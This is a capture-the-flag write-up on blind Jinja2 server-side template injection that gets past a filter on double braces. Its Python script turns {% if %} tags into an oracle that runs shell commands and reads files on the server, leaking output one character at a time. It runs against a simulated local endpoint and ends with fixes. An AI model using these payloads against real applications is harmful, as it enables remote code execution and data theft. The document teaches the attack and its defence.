Tags: ssti 

Rating: 5.0

TL;DR: SSTI in Jinja2. The input filter rejects {{ and }}, so an injected expression cannot simply be printed, but the {% and %} statement tags are not filtered and still evaluate arbitrary expressions. The {% if %} tag turns the page into a boolean oracle: it prints a marker only when the character at a chosen position of a command's output equals a guessed character. Brute-forcing the guess for each position leaks command output one character at a time, and eventually the contents of admin.html.
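The oracle described above, as an added example (not code from the challenge or from the original writeup). The vulnerable endpoint is simulated in-process, the "yes" marker and the admin.html contents are constructed here, and the gadget chain self.__init__.__globals__.__builtins__ is an assumption: the writeup's exact payload is not on this page, this is just one standard way to reach Python builtins from an unsandboxed Jinja2 template. The example generalises slightly: leak() recovers the value of any template expression, and it uses a |length probe to know when the string ends instead of guessing a fixed size.

```python
"""Blind SSTI oracle against a Jinja2 endpoint that blocks '{{' and '}}'.
Added example, not code from the challenge or the original writeup; the
endpoint, the marker string and admin.html's contents are constructed."""
import os
import string
import tempfile
from jinja2 import Template


def vulnerable_render(user_input: str) -> str:
    """Stand-in for the challenge endpoint (constructed): rejects any input
    containing '{{' or '}}', then renders what is left as a Jinja2 template."""
    if "{{" in user_input or "}}" in user_input:
        return "blocked"
    try:
        return Template("Hello " + user_input + "!").render()
    except Exception:  # a real app would serve a 500 page here
        return "error"


# Assumed gadget chain: 'self' is Jinja2's TemplateReference, its __init__ is
# defined in jinja2.runtime, and that module's globals hold the builtins dict.
BUILTINS = "self.__init__.__globals__.__builtins__"


def jinja_str(ch: str) -> str:
    """Quote a string as a Jinja2 double-quoted literal (escape \\ and ")."""
    return '"' + ch.replace("\\", "\\\\").replace('"', '\\"') + '"'


def ask(condition: str) -> bool:
    """One yes/no question: the {% if %} tag emits 'yes' only when the
    condition holds, so the page body is the oracle. No {{ }} needed."""
    page = vulnerable_render("{% if " + condition + " %}yes{% endif %}")
    return page == "Hello yes!"


# Lowercase first so typical output is found with fewer requests. '\r' is left
# out because Jinja2 normalises it to '\n' while lexing the payload.
ALPHABET = (string.ascii_lowercase + string.digits + string.ascii_uppercase
            + string.punctuation + " \n\t")


def leak(expr: str) -> str:
    """Recover the string value of a template expression one character at a
    time. Out-of-range indexing yields Undefined (never equal to a string),
    so a |length probe decides when to stop rather than a failed guess."""
    result = ""
    while ask("(%s)|length > %d" % (expr, len(result))):
        for ch in ALPHABET:
            if ask("(%s)[%d] == %s" % (expr, len(result), jinja_str(ch))):
                result += ch
                break
        else:
            result += "?"  # character outside ALPHABET; keep position aligned
    return result


def leak_command_output(cmd: str) -> str:
    """Run a shell command on the server and leak its stdout."""
    return leak('%s.__import__("os").popen(%s).read()' % (BUILTINS, jinja_str(cmd)))


def leak_file(path: str) -> str:
    """Leak a file by path (forward slashes so the literal needs no escaping)."""
    return leak("%s.open(%s).read()" % (BUILTINS, jinja_str(path.replace(os.sep, "/"))))


ADMIN_HTML = "flag{constructed_example}\n"  # constructed stand-in for admin.html


def leak_admin_html() -> str:
    """Write the constructed admin.html to a temp dir and leak it via the oracle."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "admin.html")
        with open(path, "w") as f:
            f.write(ADMIN_HTML)
        return leak_file(path)


if __name__ == "__main__":
    print(vulnerable_render("{{ 7 * 7 }}"))                          # blocked
    print(vulnerable_render("{% if 7 * 7 == 49 %}yes{% endif %}"))  # Hello yes!
    print(repr(leak_command_output("echo sstiprobe")))
    print(repr(leak_admin_html()))
```

Each leaked character costs up to len(ALPHABET) requests plus one length probe, which is why the alphabet is ordered by likelihood. The filter itself is the wrong fix: anything that concatenates user input into template source is exploitable, and the durable remedy is to pass user data as a render variable (Template("Hello {{ name }}!").render(name=user_input)) and, if untrusted templates really must be rendered, to use jinja2.sandbox.SandboxedEnvironment, which refuses attribute access such as __globals__.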

Original writeup (https://x-c-3.github.io/posts/patriotctf-2022/#mr-o).